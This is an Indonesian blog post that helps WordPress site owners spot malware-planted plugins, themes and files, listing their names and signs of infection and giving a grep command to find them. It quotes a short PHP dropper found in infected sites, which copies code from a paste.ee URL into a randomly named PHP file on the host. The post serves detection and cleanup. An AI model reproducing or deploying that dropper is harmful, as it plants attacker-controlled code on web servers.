Berikut adalah daftar plugin dan themes malware WordPress, plugin dan theme ini sebenarnya bukan user yang install, melainkan file yang digenerate/dicopy oleh malware yang berhasil masuk ke hosting.
Tersimpan di dalam folder wp-content/uploads berupa file zip yang jika foldernya dihapus akan diekstrak kembali dan juga tersimpan dalam format BLOB di database MySQL.
Bagaimana kita tahu plugin dan theme tersebut malware padahal theme/plugin tersebut ada di situs download WordPress maupun situs officialnya?
- Folder theme/plugin ada di hosting tapi tidak tampil pada daftar di Dashboard admin WordPress
- Isi file tidak sama dengan theme/plugin resminya
- Injeksi script pada file theme/plugin berupa variable base64 decoded.
Catatan: Update berkala
Files
- about.php
- lock360.php
Plugins
Malware yang menyerupai plugin asli, jika website Anda terindikasi disusupi malware, periksa plugin-plugin di bawah ini:
- admin-editor-menu-pro
- blog
- ele-dfense
- gallery-by-supsystic
- lazy-load*
- master
- remove-featured-image
- walfs
- wp-editor-theme
- wp-seo
- wp-anti-clickjack
- vs-admin-media
Themes
Themes yang biasanya terinstall (bukan user yang install)
- wp-seo
- seothemes
Hosting penuh karena banyak file PHP
Jika hosting Anda tiba-tiba penuh karena banyaknya file PHP dengan nama acak di hosting. Ini karena ada kode di dalam file PHP seperti ini yang melakukan copy file dari paste.ee ke hosting.
//IDX for each form and a string
$name = uniqid();
if ( @copy("https://paste.ee/r/BSsTM", "../../../" . $name . ".php") ) {
echo $name . "_imunify360_log_shield";
}else{
echo "Fail.";
}Scan file PHP dengan perintah berikut:
grep -inr --include=\*.php 'paste.ee' /lokasi/folderLainnya akan diupdate secara berkala.
Semoga bermanfaat.
sumber: idnetter
Red inMagz
1 komentar